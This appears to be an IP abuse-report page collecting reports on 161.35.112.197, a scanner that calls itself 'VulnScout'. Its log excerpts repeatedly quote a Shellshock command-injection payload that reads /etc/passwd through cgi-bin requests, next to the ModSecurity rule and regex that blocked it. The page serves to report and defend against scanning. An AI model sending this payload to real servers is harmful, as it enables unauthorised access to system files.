๐ง๐ช
cmbplf
2026-07-04 01:31:33
(18 hours ago)
285 requests with url.path */auth.json
170 requests with url.path *config.json
25 requests with u ...
show more
285 requests with url.path */auth.json
170 requests with url.path *config.json
25 requests with url.path *.dll
show less
Brute-Force
Bad Web Bot
๐บ๐ธ
CBJ
2026-07-01 22:37:35
(2 days ago)
fail2ban: apache-filepath-recon
...
Web App Attack
๐ณ๐ฑ
JCB
2026-06-24 08:51:00
(1 week ago)
161.35.112.197 - - [23/Jun/2026:23:43:51 +0300] "GET /KaseyaCwWebService/ManagedIT.asmx HTTP/1.1" 40 ...
show more
161.35.112.197 - - [23/Jun/2026:23:43:51 +0300] "GET /KaseyaCwWebService/ManagedIT.asmx HTTP/1.1" 404 196 "-" "VulnScout (security research; [email protected] ; https://vulnscout.com/coordinated-disclosure/)"
...
show less
Bad Web Bot
Web App Attack
๐จ๐ฑ
fjgutierrez
2026-06-22 12:42:00
(1 week ago)
Port Scan
Brute-Force
Web App Attack
๐บ๐ฆ
URAN Publishing Service
2026-06-17 07:23:03
(2 weeks ago)
161.35.112.197 - - [17/Jun/2026:10:23:03 +0300] "GET /cgi-bin/test-cgi HTTP/1.1" 404 3075 "() { igno ...
show more
161.35.112.197 - - [17/Jun/2026:10:23:03 +0300] "GET /cgi-bin/test-cgi HTTP/1.1" 404 3075 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "VulnScout (security research; [email protected] ; https://vulnscout.com/coordinated-disclosure/)"
161.35.112.197 - - [17/Jun/2026:10:23:03 +0300] "GET /cgi-bin/test.cgi HTTP/1.1" 404 3076 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "VulnScout (security research; [email protected] ; https://vulnscout.com/coordinated-disclosure/)"
...
show less
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-06-09 12:58:01
(3 weeks ago)
(mod_security) mod_security (id:221260) triggered by 161.35.112.197 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:221260) triggered by 161.35.112.197 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Jun 09 08:57:54.924668 2026] [security2:error] [pid 24156:tid 24156] [client 161.35.112.197:43996] ModSecurity: Access denied with code 403 (phase 1). Pattern match "^(?:\\\\'\\\\w+?=)?\\\\(\\\\)\\\\s{" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)||cpcontacts.jaspercity.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpcontacts.jaspercity.com"] [uri "/"] [unique_id "aigN0mmi5wt65xgUT7wEcwAAAAo"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ฆ
URAN Publishing Service
2026-06-02 00:36:15
(1 month ago)
161.35.112.197 - - [02/Jun/2026:03:36:14 +0300] "GET /cgi-bin/stats HTTP/1.1" 404 3072 "() { ignored ...
show more
161.35.112.197 - - [02/Jun/2026:03:36:14 +0300] "GET /cgi-bin/stats HTTP/1.1" 404 3072 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "VulnScout (security research; [email protected] ; https://vulnscout.com/coordinated-disclosure/)"
161.35.112.197 - - [02/Jun/2026:03:36:15 +0300] "GET /cgi-bin/status HTTP/1.1" 404 3073 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "VulnScout (security research; [email protected] ; https://vulnscout.com/coordinated-disclosure/)"
...
show less
Web App Attack
๐ฎ๐ฑ
spd.co.il
2026-06-01 12:01:38
(1 month ago)
Web application attack detected
Hacking
Web App Attack
๐จ๐ญ
backslash
2026-05-30 04:18:15
(1 month ago)
Bad Web Bot
๐ง๐ช
cmbplf
2026-05-28 11:26:41
(1 month ago)
228 requests with url.path *config.json
15 requests with url.path *.dll
Brute-Force
Bad Web Bot
๐บ๐ธ
GreekCity
2026-05-27 09:31:04
(1 month ago)
[Wed May 27 04:31:03.616502 2026] [proxy_fcgi:error] [pid 808358:tid 808358] [client 161.35.112.197: ...
show more
[Wed May 27 04:31:03.616502 2026] [proxy_fcgi:error] [pid 808358:tid 808358] [client 161.35.112.197:58892] AH01071: Got error 'Primary script unknown'
...
show less
Hacking
๐บ๐ธ
GreekCity
2026-05-27 04:31:03
(1 month ago)
bad-bot hacking for vulnerable links.
Hacking
Exploited Host
๐บ๐ธ
TPI-Abuse
2026-05-23 15:15:37
(1 month ago)
(mod_security) mod_security (id:221260) triggered by 161.35.112.197 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:221260) triggered by 161.35.112.197 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat May 23 11:15:30.341496 2026] [security2:error] [pid 12654:tid 12654] [client 161.35.112.197:49338] ModSecurity: Access denied with code 403 (phase 1). Pattern match "^(?:\\\\'\\\\w+?=)?\\\\(\\\\)\\\\s{" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)||cpcalendars.villageofallouezwi.gov|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpcalendars.villageofallouezwi.gov"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ahHEku7szVd5Gqo6tcKZtAAAACM"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
show less
Brute-Force
Bad Web Bot
Web App Attack